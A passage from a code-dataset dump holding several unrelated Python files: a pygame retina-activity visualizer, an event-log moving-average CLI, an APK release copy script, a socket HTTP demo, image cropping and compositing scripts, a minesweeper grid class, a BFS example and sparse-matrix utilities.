r.activity_bounds[3]\n self.on_starburst_activity_bounds = r.activity_bounds[4]\n self.off_starburst_activity_bounds = r.activity_bounds[5]\n \n self.colormap = [[-1.0, pygame.Color(0,0,255)], [0.0, pygame.Color(0,0,0)], [1.0, pygame.Color(255,0,0)]]\n \n self.timestep = 0\n self.end_timestep = len(self.cone_activities) - 1 \n \n def visualizeCellPlacement(self, surface, cell_type, scale=1.0):\n if cell_type == None:\n self.on_starburst_layer.draw(surface, scale=scale)\n self.off_starburst_layer.draw(surface, scale=scale)\n self.on_bipolar_layer.draw(surface, scale=scale) \n self.off_bipolar_layer.draw(surface, scale=scale) \n self.horizontal_layer.draw(surface, inflate_radius=1.0, scale=scale) \n self.cone_layer.draw(surface, scale=self.visualization_scale)\n else: \n self.on_starburst_layer.draw(surface, color=self.on_starburst_color_deselected, scale=scale)\n self.off_starburst_layer.draw(surface, color=self.off_starburst_color_deselected, scale=scale)\n 
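# draw the remaining layers in their washed-out colors before highlighting the selection\n            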
self.on_bipolar_layer.draw(surface, color=self.on_bipolar_color_deselected, scale=scale) \n self.off_bipolar_layer.draw(surface, color=self.off_bipolar_color_deselected, scale=scale) \n self.horizontal_layer.draw(surface, color=self.horizontal_color_deselected, inflate_radius=1.0, scale=scale) \n self.cone_layer.draw(surface, color=self.cone_color_deselected, scale=self.visualization_scale)\n if cell_type == \"Cone\":\n self.cone_layer.draw(surface, scale=self.visualization_scale)\n elif cell_type == \"Horizontal\":\n self.horizontal_layer.draw(surface, scale=self.visualization_scale)\n elif cell_type == \"On Bipolar\":\n self.on_bipolar_layer.draw(surface, scale=scale) \n elif cell_type == \"Off Bipolar\":\n self.off_bipolar_layer.draw(surface, scale=scale) \n elif cell_type == \"On Starburst\":\n self.on_starburst_layer.draw(surface, scale=scale)\n elif cell_type == \"Off Starburst\":\n self.off_starburst_layer.draw(surface, scale=scale) \n \n def updateVisualizationSurface(self, buttons_pressed, mouse_x, mouse_y):\n scale = self.visualization_scale\n surface = self.visualization_surface\n \n surface.fill(self.visualization_background_color)\n \n vis_button_pressed = buttons_pressed[0]\n cell_button_pressed = buttons_pressed[1]\n \n if not(vis_button_pressed==None):\n vis_type = vis_button_pressed.name\n \n cell_type = None\n if cell_button_pressed != None: \n cell_type = cell_button_pressed.name \n \n if vis_type == \"Soma Placement\":\n pygame.display.set_caption(vis_type + \" \" + str(cell_type))\n self.visualizeCellPlacement(surface, cell_type, scale)\n \n elif vis_type == \"Activity\":\n if cell_type != None:\n self.retina.loadPast(self.timestep)\n self.retina.drawLayerActivity(surface, cell_type, self.colormap, scale)\n pygame.display.set_caption(vis_type + \" \" + str(cell_type) + \" \" + str(self.timestep))\n \n self.screen_surface.blit(self.visualization_surface, self.visualization_position)\n \n \n def updateControlSurface(self, mouse_x, mouse_y, mouse_click):\n # Shift the mouse coordinates into the coordinate system of the controls surface \n mouse_x -= self.controls_position[0]\n mouse_y -= self.controls_position[1]\n \n # Erase the surface\n self.controls_surface.fill(self.controls_background_color)\n \n # Update the buttons\n self.visualization_type_button_group.update(mouse_x, mouse_y, mouse_click)\n self.cell_type_button_group.update(mouse_x, mouse_y, mouse_click)\n self.direction_arrows_button_group.update(mouse_x, mouse_y, mouse_click)\n \n # Draw the buttons\n self.visualization_type_button_group.draw()\n self.cell_type_button_group.draw()\n self.direction_arrows_button_group.draw()\n \n # Draw the control surface to the screen\n self.screen_surface.blit(self.controls_surface, self.controls_position)\n \n # Hack to reset the directional arrows after using them to change the current timestep\n direction_button_pressed = self.direction_arrows_button_group.getPressedButton()\n if direction_button_pressed == None:\n pass\n elif direction_button_pressed.name == \"Left\":\n self.timestep -= 1\n if self.timestep < 0: self.timestep = self.end_timestep\n elif direction_button_pressed.name == \"Right\":\n self.timestep += 1\n if self.timestep > self.end_timestep: self.timestep = 0\n self.direction_arrows_button_group.resetButtons(mouse_x, mouse_y, False)\n \n # Determine if any buttons have been pressed\n vis_button_pressed = self.visualization_type_button_group.getPressedButton()\n cell_button_pressed = self.cell_type_button_group.getPressedButton()\n buttons_pressed = 
[vis_button_pressed, cell_button_pressed]\n \n return buttons_pressed\n \n \n \n def calculateVisualizationScaling(self): \n width_scale = self.visualization_width / float(self.retina.grid_width)\n height_scale = self.visualization_height / float(self.retina.grid_height)\n return min(width_scale, height_scale)\n \n \n\"\"\"\nLinkedButtons are a group of buttons where at maximum one can be depressed at a time\n\"\"\" \nclass LinkedButtons:\n def __init__(self, buttons):\n self.buttons = buttons\n self.number_buttons = len(buttons)\n \n def getPressedButton(self): \n for button in self.buttons:\n if button.isPressed(): return button \n return None\n \n def draw(self):\n for button in self.buttons:\n button.draw()\n \n def resetButtons(self, mouse_x, mouse_y, mouse_clicked):\n for button in self.buttons:\n button.reset()\n button.update(mouse_x, mouse_y, mouse_clicked)\n \n \n def update(self, mouse_x, mouse_y, mouse_clicked):\n # Update the buttons and stop if a button just became pressed\n for button_index in range(self.number_buttons):\n button = self.buttons[button_index]\n just_pressed = button.update(mouse_x, mouse_y, mouse_clicked)\n if just_pressed: \n pressed_button_index = button_index\n break\n \n # If a button was just pressed, make sure all the other buttons in the\n # group are not pressed \n if just_pressed:\n for button_index in range(self.number_buttons):\n if button_index != pressed_button_index:\n button = self.buttons[button_index]\n button.reset()\n button.update(mouse_x, mouse_y, False)\n \n\"\"\"\nButton is a little button class that has a couple visual flourishes\n\"\"\"\nclass Button:\n\n def __init__(self, display, x=100, y=100, width=200, height=50, \n button_normal_color=(0,197,234), \n button_pressed_color=(0,149,219),\n button_hover_color=(0,180,229),\n button_shadow_color=(13,105,146),\n text=\"Test String\", text_color=(255,255,255), fontName=None,\n fontSize=24, antialias=True, name=\"Test\"):\n \n self.display = display\n \n self.name = name\n \n self.button_rectangle = pygame.Rect(x, y, width, height) \n \n self.font = pygame.font.Font(fontName, fontSize)\n self.label = self.font.render(text, antialias, text_color)\n self.label_rectangle = self.label.get_rect()\n self.label_rectangle.center = self.button_rectangle.center\n \n self.button_normal_color = pygame.Color(button_normal_color[0], button_normal_color[1], button_normal_color[2])\n self.button_hover_color = pygame.Color(button_hover_color[0], button_hover_color[1], button_hover_color[2])\n self.button_pressed_color = pygame.Color(button_pressed_color[0], button_pressed_color[1], button_pressed_color[2])\n self.button_shadow_color = pygame.Color(button_shadow_color[0], button_shadow_color[1], button_shadow_color[2])\n self.button_color = self.button_normal_color\n \n self.button_pressed = False\n \n def reset(self):\n self.button_pressed = False\n def isPressed(self):\n return self.button_pressed\n \n def draw(self):\n # Draw the button\n pygame.draw.rect(self.display, self.button_color, self.button_rectangle)\n \n # Draw the button shadow if necessary\n if self.button_pressed: pygame.draw.rect(self.display, self.button_shadow_color, self.button_rectangle, 1)\n \n # Draw the text on top\n self.display.blit(self.label, self.label_rectangle)\n \n \n def update(self, mouse_x, mouse_y, mouse_click):\n mouse_within_button = self.button_rectangle.collidepoint(mouse_x, mouse_y)\n \n if self.button_pressed:\n if mouse_within_button and mouse_click:\n self.button_color = self.button_normal_color\n 
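# the button starts in its released state\n        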
self.button_pressed = False\n else:\n self.button_color = self.button_pressed_color\n \n elif self.button_rectangle.collidepoint(mouse_x, mouse_y):\n if mouse_click:\n self.button_color = self.button_pressed_color\n self.button_pressed = True\n return True\n else:\n self.button_color = self.button_hover_color\n \n else:\n self.button_color = self.button_normal_color\n \n return False\n \n \n \n\"\"\"\nLinearly interpolate between color1 and color2\n\"\"\"\ndef lerpColors(color1, color2, fraction):\n r = color1.r + fraction * (color2.r - color1.r)\n g = color1.g + fraction * (color2.g - color1.g)\n b = color1.b + fraction * (color2.b - color1.b)\n return pygame.Color(int(r),int(g),int(b))\n\n\"\"\"\nLinear distance between two points\n\"\"\"\ndef linearDistance(x1, y1, x2, y2):\n return ((x2-x1)**2.0 + (y2-y1)**2.0)**0.5\n\n\n","sub_path":"NewVisualizer.py","file_name":"NewVisualizer.py","file_ext":"py","file_size_in_byte":18104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"243413257","text":"#!/bin/python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 29 09:09:14 2019\r\n@author: skondaveeti\r\n\"\"\"\r\nimport json\r\nimport datetime\r\nimport os\r\nimport sys\r\nimport argparse\r\n\r\n\r\nclass unbabel_cli:\r\n\r\n def __init__(self):\r\n self.json_file = None\r\n self.ws = None\r\n\r\n def is_valid_file(self, parser, arg):\r\n \"\"\"\r\n Validate the input file\r\n params :\r\n parser : ArgumentParser Handle ==> ArgumentParser\r\n arg : string ==> Input file name.\r\n return :\r\n an open file handle\r\n \"\"\"\r\n if not os.path.exists(arg):\r\n parser.error(\"The file %s does not exist!\" % arg)\r\n else:\r\n return open(arg, 'r') # return an open file handle\r\n\r\n def validate_event(self, event):\r\n \"\"\"\r\n validate event having the below mandatory keys:\r\n - duration\r\n - event_name and is set to translation_delivered\r\n - timestamp\r\n params:\r\n event : dict\r\n return :\r\n True/False\r\n \"\"\"\r\n required = ['event_name', 'duration', 'timestamp']\r\n for elt in required:\r\n if elt not in event.keys():\r\n return False\r\n if event['event_name'] != 'translation_delivered':\r\n return False\r\n return True\r\n\r\n def validate_on_win_size(self, date, event_date, window_size=10):\r\n \"\"\"\r\n validate the event on basis of Window Size.\r\n params:\r\n date : current date\r\n event_date : date from the list of events\r\n return :\r\n True/False\r\n True : if difference between date and event_date is <= window_size\r\n False : if not\r\n \"\"\"\r\n window_size_delta = datetime.timedelta(minutes=window_size)\r\n if (date - event_date).days < 0:\r\n return False\r\n return (date - event_date) <= window_size_delta\r\n\r\n def compute_ma_time(self, events, frequency=1, window_size=10):\r\n \"\"\"\r\n Count for each 'frequency' the average delivery time of 'events' for\r\n the past 'window_size' minutes\r\n params :\r\n events : list ==> sorted events list\r\n frequency : int ==> minutes\r\n window_size : int ==> last X minutes\r\n return :\r\n list of dict\r\n \"\"\"\r\n cls_ub = unbabel_cli()\r\n frequency_delta = datetime.timedelta(minutes=frequency)\r\n start_time = datetime.datetime.strptime(events[0]['timestamp'], '%Y-%m-%d %H:%M:%S.%f').replace(second=0,\r\n microsecond=0)\r\n end_time = datetime.datetime.strptime(events[len(events) - 1]['timestamp'], '%Y-%m-%d %H:%M:%S.%f').replace(\r\n second=0, microsecond=0) + frequency_delta\r\n date = start_time\r\n data = []\r\n while date <= end_time:\r\n 
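# tally events inside the trailing window and their cumulative duration\r\n            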
N = 0\r\n            cum_sum = 0\r\n            for idx, event in enumerate(events, 1):\r\n                if not cls_ub.validate_event(event):\r\n                    raise unbabel_cli_error('%s is not a valid event entry' % event)\r\n                event_date = datetime.datetime.strptime(event['timestamp'], '%Y-%m-%d %H:%M:%S.%f')\r\n                if cls_ub.validate_on_win_size(date, event_date, window_size):\r\n                    N += 1\r\n                    cum_sum += event['duration']\r\n            if N:\r\n                data.append({'date': str(date), 'average_delivery_time': cum_sum / float(N)})\r\n            else:\r\n                data.append({'date': str(date), 'average_delivery_time': 0})\r\n            date += frequency_delta\r\n        # Writes the output to output.txt file\r\n        f = open(\"output.txt\", \"w+\")\r\n        for i in range(len(data)):\r\n            f.write(str(data[i]) + \"\\\\n\")\r\n        f.close()\r\n        # Writes the output to data.json, if needed in JSON Format.\r\n        with open('data.json', 'w') as outfile:\r\n            json.dump(data, outfile)\r\n\r\n    def exit_requirement_error(self):\r\n        \"\"\"\r\n        Utility function to display on requirement mismatch error.\r\n        \"\"\"\r\n        requirement_error = \"\"\"Requirements :: \r\n            must run on python 3.6\r\n        Execution Format ::\r\n            unbabel_cli --input_file (filename) --window_size (timeframe)\r\n            filename and timeframe are required\r\n            timeframe must be an integer\r\n        use --help to print this message\r\n        \"\"\"\r\n        print(requirement_error)\r\n        sys.exit(2)\r\n\r\n    def main_func(self, args):\r\n        \"\"\"\r\n        Main Function which loads the event data, sort the data and compute the moving average time and writes to\r\n        data.json\r\n        params :\r\n            args : ArgumentParser Handle ==> Parsed input arguments.\r\n        \"\"\"\r\n        # Get data and add it to the running counter\r\n        self.json_file = args.input_file.name\r\n        self.ws = args.window_size\r\n        if not os.path.isfile(self.json_file):\r\n            raise unbabel_cli_error('File Does not exist')\r\n        events = [json.loads(line) for line in open(self.json_file, 'r')]\r\n        events = sorted(events, key=lambda k: datetime.datetime.strptime(k['timestamp'], '%Y-%m-%d %H:%M:%S.%f'))\r\n        cl_unbabel.compute_ma_time(events, window_size=self.ws)\r\n\r\n\r\nclass unbabel_cli_error(Exception):\r\n    pass\r\n\r\n\r\nif __name__ == '__main__':\r\n    # Get arguments from the command line\r\n    cl_unbabel = unbabel_cli()\r\n    try:\r\n        parser = argparse.ArgumentParser(\r\n            description='command line application that parses a stream of events and produces an aggregated output.')\r\n        parser.add_argument('--input_file', type=lambda x: cl_unbabel.is_valid_file(parser, x), required=True,\r\n                            help='event log file Path {Ex:: events.json}')\r\n        parser.add_argument('--window_size', type=int, required=True,\r\n                            help='number representing window size (in minutes)')\r\n        args = parser.parse_args()\r\n        cl_unbabel.main_func(args)\r\n    except Exception:  # do not swallow SystemExit, so --help still works\r\n        cl_unbabel.exit_requirement_error()\r\n","sub_path":"unbabel_cli.py","file_name":"unbabel_cli.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"469564185","text":"# coding=utf-8\nimport shutil\nimport sys\nimport os\nimport subprocess\nimport datetime\nimport re\nimport getopt\nimport time\n\n\nclass Options:\n    def __init__(self):\n        self.product_name = None\n        self.project_name = None\n\nOPTIONS = Options()\n\n\ndef handle_data(argv):\n    try:\n        options, args = getopt.getopt(argv, \"p:j:\")\n    except getopt.GetoptError:\n        sys.exit(2)\n\n    for name, value in options:\n        if name in \"-p\":\n            OPTIONS.product_name = value\n        if name in \"-j\":\n            OPTIONS.project_name = value\n\n\ndef release_apk():\n    apks_name = 
os.listdir(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\")\n for apk in apks_name:\n src = \"/var/jenkins_home/APK/APK_FAST_RELEASE/APK/{0}\".format(apk)\n dst = apk_release_path + \"/\" + apk + \"/\" + baseline\n if not os.path.exists(apk_release_path + \"/\" + apk):\n os.makedirs(apk_release_path + \"/\" + apk)\n shutil.copytree(src, dst)\n with open(dst + \"/time.txt\", 'w') as f:\n f.write(\"time\")\n os.remove(dst + \"/time.txt\")\n print('##APK:{0}; 已经发布到:{1}'.format(apk, dst.replace('/mnt','\\\\\\\\10.250.115.51').replace('/','\\\\')))\n\n\ndef release_indus():\n src = r\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\"\n dst = r\"{0}/indus/{1}\".format(apk_release_path, baseline)\n shutil.copytree(src, dst)\n print('##Indus:已经发布到{0}'.format(dst.replace('/mnt','\\\\\\\\10.250.115.51').replace('/','\\\\')))\n\n\nif __name__ == '__main__':\n handle_data(sys.argv[1:])\n\n p = re.compile('.*(\\(.*\\))')\n m = re.match(p, OPTIONS.product_name)\n if m is not None:\n OPTIONS.product_name = OPTIONS.product_name.replace(m.group(1), '')\n\n zip_path = \"/var/jenkins_home/APK/APK_FAST_RELEASE/APK.zip\"\n ip = \"/mnt\"\n apk_release_path = \"{0}/APK_Release_Version/03-product/{1}\".format(ip, OPTIONS.product_name)\n\n baseline = datetime.datetime.now().strftime(\"%Y.%m.%d_%H.%M\")\n\n\n if not os.path.exists(zip_path):\n print(\"#未上传包含所有APK的zip压缩包,请上传!!\")\n sys.exit(1)\n print(\"##开始解压Zip压缩包...\")\n if os.path.exists(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\"):\n shutil.rmtree(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\")\n\n if not os.path.exists(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\"):\n os.makedirs(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\")\n\n\n unzip_cmd = \"unzip /var/jenkins_home/APK/APK_FAST_RELEASE/APK.zip -d /var/jenkins_home/APK/APK_FAST_RELEASE/APK\"\n os.system(unzip_cmd)\n\n time.sleep(5)\n \n if OPTIONS.project_name == \"indus\":\n release_indus()\n else:\n release_apk()\n\n\n time.sleep(5)\n shutil.rmtree(\"/var/jenkins_home/APK/APK_FAST_RELEASE/APK\")","sub_path":"script/ApkRelease/apk_fast_release.py","file_name":"apk_fast_release.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"469764565","text":"# Tcp编程测试\nimport socket\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('www.sina.com.cn',80))\ns.send(b'GET / HTTP/1.1\\r\\nHost: www.sina.com.cn\\r\\nConnection: close\\r\\n\\r\\n')\nbuffer=[]\nwhile True:\n d=s.recv(1024)\n if d:\n buffer.append(d)\n else:\n break\ndata=b''.join(buffer)\ns.close()\nheader,html = data.split(b'\\r\\n\\r\\n',1)\nprint(header.decode('utf-8'),html.decode('utf-8'))\nwith open('sina.html','wb') as f:\n f.write(html)\n'''\n# 输出结果如下:\n# ==============================\nD:\\GitHub\\PythonLearnProject\\网络编程>python Tcp.py\nHTTP/1.1 302 Moved Temporarily\nServer: nginx\nDate: Tue, 14 Aug 2018 02:34:31 GMT\nContent-Type: text/html\nContent-Length: 154\nConnection: close\nLocation: https://www.sina.com.cn/\nX-Via-CDN: f=edge,s=ctc.ningbo.ha2ts4.104.nb.sinaedge.com,c=182.138.101.45;\nX-Via-Edge: 15342140710462d658ab6eebeee7305077e44\n\n302 Found\n\n

    302 Found

    \n
    nginx
    \n\n\n# ==============================\n'''","sub_path":"网络编程/Tcp.py","file_name":"Tcp.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"151461712","text":"import cv2\nimport os\nfrom os import listdir, getcwd\nfrom os.path import join\nfrom PIL import Image\n\nwd = getcwd()\n\ndef draw_bbox(img_file, bbox=None, out_pic=None):\n img = Image.open(img_file)\n img.crop((bbox[0], bbox[1], bbox[2], bbox[3])).save(out_pic, \"JPEG\", quality=100)\n print('save into',out_pic)\n \n\ndef draw_all_bboxes(result,out_image_folder=None,out_label_folder=None):\n with open(result, 'r') as f:\n results_list = f.readlines()\n count=0\n for line in results_list:\n line=line.split()\n if (float(line[1])>0.95):\n count=count+1\n image_file=os.path.join(wd,'images',line[0]+'.jpg')\n bbox=[int(float(line[2])), int(float(line[3])), int(float(line[4])), int(float(line[5]))]\n \n #print (line)\n #print(bbox)\n out_pic= os.path.join(out_image_folder,line[0]+'_num'+str(count)+'.jpg')\n out_label=os.path.join(out_label_folder,line[0]+'_num'+str(count)+'.txt')\n draw_bbox(image_file, bbox, out_pic)\n label='0 0'\n label_out_file = open(out_label, 'w')\n label_out_file.write(label)\n print('save into',out_label)\n label_out_file.close()\n\n\n\n\nif __name__ == \"__main__\":\n result = \"./results/results.txt\"\n out_image_folder = \"./worker_img/\"\n out_label_folder='./worker_labels/'\n draw_all_bboxes(result,out_image_folder,out_label_folder)\n\n","sub_path":"draw_bbox.py","file_name":"draw_bbox.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"225947033","text":"import numpy as np\nfrom PIL import Image\nimport os\nimport cv2\n\n\ndef rescale(img, short_side_size):\n (w, h) = img.size\n short_side = min(w,h)\n scale = short_side_size/short_side\n dim = (int(w*scale),int(h*scale))\n return img.resize(dim)\n\n\ndef genmask(foreground, background, cor, name):\n mask = Image.new('L', background.size)\n fg = np.array(foreground)\n alpha = Image.fromarray(fg[:,:,3])\n # print(foreground.size)\n # print(fg.shape)\n # cv2.imwrite('tmp.png', fg)\n # fg = foreground.convert('L')\n mask.paste(alpha, cor, alpha)\n mask.save('./pasted_img/mask/pm_'+name+'.png')\n # cv2.imwrite('./pasted_img/mask/pm_'+name+'.png', mask)\n # #\n\ndef main():\n f_short_side_size = 600\n b_short_side_size = 900\n\n fg_list = os.listdir('./fgimgs')\n bg_list = os.listdir('./bgimgs')\n\n for fg in fg_list:\n if fg.endswith('.png'):\n randx = np.random.randint(-50,50)\n randy = np.random.randint(-50,50)\n foreground = Image.open('./fgimgs/'+fg)\n fg_name = fg.split('.')[0]\n\n bg = bg_list[np.random.randint(len(bg_list))]\n\n if bg.endswith('.jpg'):\n #angle = [0, 90, 180, 270][np.random.randint(0, 4)]\n #foreground = foreground.rotate(angle)\n bg_name = bg.split('.')[0]\n background = Image.open('./bgimgs/'+bg)\n\n background = rescale(background,b_short_side_size)\n foreground = rescale(foreground,f_short_side_size)\n print('----background---', background.size)\n print('----foreground---', foreground.size)\n\n b_center = (background.size[0]//2,background.size[1]//2)\n f_center = (foreground.size[0]//2,foreground.size[1]//2)\n f_left = (b_center[0]-f_center[0]+randx,b_center[1]-f_center[1]+randy)\n\n background.paste(foreground,f_left,foreground)\n background.save('./pasted_img/img/p_'+fg_name+'_'+bg_name+'.jpg')\n\n 
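# The matching ground-truth mask is produced from the same placement: genmask pastes the foreground's alpha channel at offset f_left onto a blank grayscale ('L') canvas the size of the background.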
genmask(foreground,background,f_left,fg_name+'_'+bg_name)\n\n\nif __name__ =='__main__':\n    main()\n","sub_path":"gendata/gendata.py","file_name":"gendata.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"385194434","text":"from random import *\n\n\nclass Layout():\n    def __init__(self, game_settings=None):\n        \"\"\" Initialize the layout grid settings \"\"\"\n        if game_settings:\n            # grid width/height; can be changed later\n            self.width = game_settings.cell_column_number\n            self.height = game_settings.cell_row_number\n            # set the number of mines; can be changed later / wrap in a function\n            self.mine_num = game_settings.mine_num\n        else:  # mainly used for unit tests\n            self.width = 8\n            self.height = 8\n            self.mine_num = 5\n        # 2D array storing how many mines surround each cell, initialized to zero\n        self.mine_array = [[0 for i in range(self.width)] for i in range(self.height)]\n        # hint cells already opened during computation\n        self.tips = []\n\n    def reset_array(self):\n        # reset the array\n        self.mine_array = [[0 for i in range(self.width)] for i in range(self.height)]\n\n    def get_random_position(self):\n        \"\"\"\n        Randomly choose positions at which to place the mines\n        :return: positions, a list of (i, j) tuples\n        (tested 181220)\n        \"\"\"\n        mine_left = self.mine_num\n        # stores how many mines are buried in each column\n        column_mine_num = []\n        for i in range(self.width-1):\n            if mine_left > self.height:\n                mine_num = randint(0, self.height//3*2)\n            else:\n                mine_num = randint(0, mine_left//2)\n            mine_left -= mine_num\n            column_mine_num.append(mine_num)\n            if mine_left == 0:\n                break\n        if mine_left != 0:\n            if mine_left > self.height:  # if the remaining mines exceed the rows of the last column, re-run set\n                self.set_mine()\n            else:\n                column_mine_num.append(mine_left)\n        # print(\"column_mine_num: \")\n        # print(column_mine_num)\n        # positions records the (i, j) tuples at which mines are placed\n        j = 0\n        positions = []\n        for mine_num in column_mine_num:\n            rows = sample(range(self.height), mine_num)\n            # print(\"row: \")\n            # print(rows)\n            for row in rows:\n                positions.append((row, j))\n            j += 1\n        return positions\n\n    def set_mine(self):\n        \"\"\"\n        Place the mines and update the numbers of the surrounding cells\n        (tested 181220)\n        \"\"\"\n        position = self.get_random_position()\n        for (i, j) in position:\n            # update the mine cell and each of its neighbors\n            # a cell holding a mine is >= 9\n            self.mine_array[i][j] = 9\n            if i > 0:\n                self.mine_array[i-1][j] += 1\n                if j > 0:\n                    self.mine_array[i-1][j-1] += 1\n                if j < self.width - 1:\n                    self.mine_array[i - 1][j + 1] += 1\n            if j > 0:\n                self.mine_array[i][j-1] += 1\n            if i < self.height -1:\n                self.mine_array[i+1][j] += 1\n                if j < self.width - 1:\n                    self.mine_array[i + 1][j + 1] += 1\n                if j > 0:\n                    self.mine_array[i + 1][j - 1] += 1\n            if j < self.width - 1:\n                self.mine_array[i][j+1] += 1\n\n    def input_update_array(self, i, j):\n        \"\"\"\n        The user selects position (i, j); if it holds a mine the game is lost,\n        if it is an empty cell the surrounding cells are opened.\n        tips records the hint cells to open this turn.\n        :return: state of game (boolean)\n        (tips/mine_array tested 181220)\n        \"\"\"\n        if self.mine_array[i][j] >= 9:\n            # the user stepped on a mine\n            return False\n        if self.mine_array[i][j] == 0:\n            # the user hit an empty cell: mark all connected empty cells as -1, meaning opened\n            self.mine_array[i][j] = -1\n            waited = [(i, j)]\n            while len(waited) > 0:\n                # waited holds cells whose neighbors have not been visited yet (only up/down/left/right needed)\n                # tips holds the hint cells to open (all 8 possible directions must be recorded)\n                (i, j) = waited.pop()\n                if i > 0:\n                    # print(i, j)\n                    if self.mine_array[i-1][j] == 0:  # up\n                        self.mine_array[i-1][j] = -1\n                        waited.append((i-1, j))\n                    # add the surrounding hint cells (up, up-left, up-right directions)\n                    elif 0 < self.mine_array[i-1][j] < 9 and (i-1, j) not in self.tips:  # up\n                        self.tips.append((i-1, j))\n                    if j > 0 and 0 < self.mine_array[i-1][j-1] < 9 and (i-1, j-1) not in self.tips:  # up-left\n                        self.tips.append((i-1, j-1))\n                    if j < self.width - 1 and 0 < self.mine_array[i-1][j+1] < 9 and (i-1, j+1) not in self.tips:  # up-right\n                        self.tips.append((i-1, j+1))\n                if j > 0:\n                    if self.mine_array[i][j-1] == 0:  # left\n                        self.mine_array[i][j-1] = -1\n                        waited.append((i, 
j-1))\n                    # add the surrounding hint cells (left direction)\n                    elif 0 < self.mine_array[i][j-1] < 9 and (i, j-1) not in self.tips:\n                        self.tips.append((i, j-1))\n                if i < self.height - 1:\n                    if self.mine_array[i+1][j] == 0:  # down\n                        self.mine_array[i+1][j] = -1\n                        waited.append((i+1, j))\n                    # add the surrounding hint cells (down, down-left, down-right directions)\n                    elif 0 < self.mine_array[i+1][j] < 9 and (i+1, j) not in self.tips:\n                        self.tips.append((i+1, j))\n                    if j < self.width - 1 and 0 < self.mine_array[i+1][j+1] < 9 and (i+1, j+1) not in self.tips:  # down-right\n                        self.tips.append((i+1, j+1))\n                    if j > 0 and 0 < self.mine_array[i+1][j-1] < 9 and (i+1, j-1) not in self.tips:  # down-left\n                        self.tips.append((i+1, j-1))\n                if j < self.width - 1:\n                    if self.mine_array[i][j+1] == 0:  # right\n                        self.mine_array[i][j+1] = -1\n                        waited.append((i, j+1))\n                    # add the surrounding hint cells (right direction)\n                    if 0 < self.mine_array[i][j+1] < 9 and (i, j+1) not in self.tips:\n                        self.tips.append((i, j+1))\n        else:\n            self.tips.append((i, j))\n        self.tips.sort()\n        return True\n\n\n# if __name__ == \"__main__\":\n#     layout = Layout()\n#     layout.set_mine()\n#     print(layout.mine_num)\n#     for row in layout.mine_array:\n#         print(row)\n#     layout.get_input_position(2,3)\n#     print(\"after\")\n#     for row in layout.mine_array:\n#         print(row)\n","sub_path":"module/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":6828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"310854868","text":"from AdjListGraph import Graph\nfrom AdjListGraph import Vertex\n\nG = Graph(True)\nG.addVertex('a')\nG.addVertex('b')\nG.addVertex('c')\nG.addVertex('d')\nG.addVertex('e')\nG.addVertex('f')\nG.addEdge('a', 'b', 1) \nG.addEdge('a', 'c', 1)\nG.addEdge('b', 'd', 1)\nG.addEdge('b', 'e', 1)\nG.addEdge('c', 'd', 1)\nG.addEdge('c', 'e', 1)\nG.addEdge('d', 'e', 1)\nG.addEdge('e', 'a', 1)\nG.addEdge('a', 'f', 1)\nprint (G.getEdges())\nfor k in G.getEdges():\n    print(k)\n\n\nfrom collections import deque\n\ndef bfs(G, start, dest):\n    queue = deque()  # vertex\n    visited = set()  # vertex id\n    parent = {}  # vertex id\n    queue.append(start)\n    visited.add(start.getVertexID())  # mark the start so it is never re-enqueued\n    while len(queue) != 0:\n        curr = queue.popleft()  # vertex\n        print(\"visiting \", curr.getVertexID())\n        if (curr.getVertexID() == dest.getVertexID()):\n            return parent\n        neighbors = G.getNeighbors(curr.getVertexID())\n        for n in neighbors:\n            id = n.getVertexID()\n            if id not in visited:  # skip already-discovered vertices; the graph contains the cycle e -> a\n                visited.add(id)\n                parent[id] = curr.getVertexID()\n                queue.append(n)\n    return None\n\nstart = G.getVertex('a')\ndest = G.getVertex('e')\nparent = bfs(G, start, dest)\nprint(parent)","sub_path":"Python Algrothm Advanced/practice/170401BFS.py","file_name":"170401BFS.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"99353342","text":"import pandas as pd\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sps\nfrom scipy.sparse import hstack\nimport time, sys\nfrom old_stuff.new_utils import utils\n\ndef check_matrix(X, format='csc', dtype=np.float32):\n    if format == 'csc' and not isinstance(X, sps.csc_matrix):\n        return X.tocsc().astype(dtype)\n    elif format == 'csr' and not isinstance(X, sps.csr_matrix):\n        return X.tocsr().astype(dtype)\n    elif format == 'coo' and not isinstance(X, sps.coo_matrix):\n        return X.tocoo().astype(dtype)\n    elif format == 'dok' and not isinstance(X, sps.dok_matrix):\n        return X.todok().astype(dtype)\n    elif format == 'bsr' and not isinstance(X, sps.bsr_matrix):\n        return X.tobsr().astype(dtype)\n    elif format == 'dia' and not isinstance(X, sps.dia_matrix):\n        return X.todia().astype(dtype)\n    elif format == 'lil' 
